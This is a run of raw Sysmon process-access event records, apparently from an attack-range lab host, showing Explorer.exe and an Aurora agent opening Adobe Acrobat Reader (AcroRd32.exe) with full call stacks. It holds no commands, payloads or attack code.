DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39909 10341000x800000000000000046637Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.330{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39909|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046636Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.329{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39909|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046635Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.329{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39909|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64) 10341000x800000000000000046634Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.329{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39909 10341000x800000000000000046633Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.328{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+12a10(wow64)|C:\Windows\System32\shcore.dll+36766(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39909|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046632Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.327{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+397f4|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046631Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.326{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+397f4|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046630Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.326{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+397f4|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046629Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.326{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+397f4|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 10341000x800000000000000046628Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.324{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39760|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046627Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.324{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b908c(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39760|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046626Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.324{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39760|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b 10341000x800000000000000046625Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.324{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+1b9077(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+39760|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9 10341000x800000000000000046624Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.322{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046623Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.322{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046622Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.322{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E64A-63C7-8706-00000000AF02}1400C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000046621Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.322{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+1b9159(wow64)|C:\Windows\System32\windows.storage.dll+1b8f55(wow64)|C:\Windows\System32\windows.storage.dll+1b8db6(wow64)|C:\Windows\System32\shcore.dll+366c2(wow64)|C:\Windows\System32\shcore.dll+36625(wow64)|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3f976|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3965a|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+3920b|C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe+38ca9|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000046620Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:03.322{FE4C2B44-E64A-63C7-8706-00000000AF02}14002708C:\Program Files (x86)\Adobe\Acrobat Reader 